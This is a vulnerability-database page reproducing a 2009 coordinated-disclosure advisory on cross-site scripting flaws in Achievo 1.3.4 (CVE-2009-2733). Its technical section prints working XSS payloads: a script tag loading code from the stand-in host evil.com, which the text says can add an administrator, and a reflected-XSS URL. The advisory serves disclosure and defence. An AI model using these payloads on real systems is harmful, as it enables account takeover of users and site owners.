Vulners
Lucene search
Achievo 1.3.4 - Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Achievo <= 1.3.4 xss | 14 Oct 200900:00 | – | zdt |
 | Achievo < 1.4.0 Multiple Vulnerabilities | 15 Oct 200900:00 | – | nessus |
 | CVE-2009-2733 | 13 Oct 200900:00 | – | circl |
 | CVE-2009-2733 | 16 Oct 200916:00 | – | cve |
 | CVE-2009-2733 | 16 Oct 200916:00 | – | cvelist |
 | EUVD-2009-2724 | 7 Oct 202500:30 | – | euvd |
 | Achievo 1.3.4 - Cross-Site Scripting | 14 Oct 200900:00 | – | exploitpack |
 | CVE-2009-2733 | 16 Oct 200916:30 | – | nvd |
 | Achievo Cross Site Scripting | 14 Oct 200900:00 | – | packetstorm |
 | Cross site scripting | 16 Oct 200916:30 | – | prion |
10
Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/
Multiple XSS in Achievo
1. *Advisory Information*
Title: Multiple XSS in Achievo
Advisory ID: BONSAI-2009-0101
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2733
3. *Software Description*
Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organizations to support their business processes in a simple, but effective
manner [0].
4. *Vulnerability Description*
Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from a user
in the output it generates without validating or encoding it.
For additional information, please read [1].
5. *Vulnerable packages*
Version <= 1.3.4
6. *Non-vulnerable packages*
Achievo developers informed us that all users should upgrade to the latest
version of Achievo, which fixes this vulnerability. More information to be
found here:
http://www.achievo.org/
7. *Credits*
This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).
8. *Technical Description*
8.1 A Persistent Cross Site Scripting vulnerability was found in the 'tittle'
variable within the scheduler module. This is because the application does not
properly sanitise the users input. The vulnerability can be triggered by a user
submitting the following data within the scheduler title:
<SCRIPT SRC=//evil.com/xss.js></SCRIPT>
Which will include the xss.js javascript file within the schedule. A javascript
that exploits this issue and creates a new administrator user in the system can
be found in Bonsai's blog [2].
8.2 A Reflected Cross Site Scripting vulnerability was found in the
atksearch[contractnumber], atksearch_AE_customer[customer] and
atksearchmode[contracttype] variables within the 'Organisation Contracts'
administration page. This is because the application does not properly sanitise
the users input. The vulnerability can be triggered by clicking on the
following URL:
http://www.example.com/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_contracttype[contracttype][=&atksearchmode[contracttype]=exact&atksearch_AE_customer[customer]="><script>alert('xss');</script>&atksearchmode[customer]=substring
9. *Report Timeline*
- 2009-07-09:
Vulnerabilities were identified.
- 2009-08-08:
Vendor contacted.
- 2009-08-12:
Vendor confirmed vulnerabilities.
- 2009-08-14:
Vendor sets possible release date of fixed version to Monday 12 Oct.
- 2009-10-12:
Vendor released fixed version.
- 2009-10-13:
The advisory BONSAI-2009-0101 is published.
10. *References*
[0] http://www.achievo.org/
[1] http://www.owasp.org/index.php/Cross_site_scripting
[2] http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/
11. *About Bonsai*
Bonsai is a company involved in providing professional computer
information security services.
Currently a sound growth company, since its foundation in early 2009
in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our
customers' real needs.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Bonsai
Information Security, and may be
distributed freely provided that no fee is charged for this
distribution and proper credit is
given.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Oct 2009 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
EPSS0.05471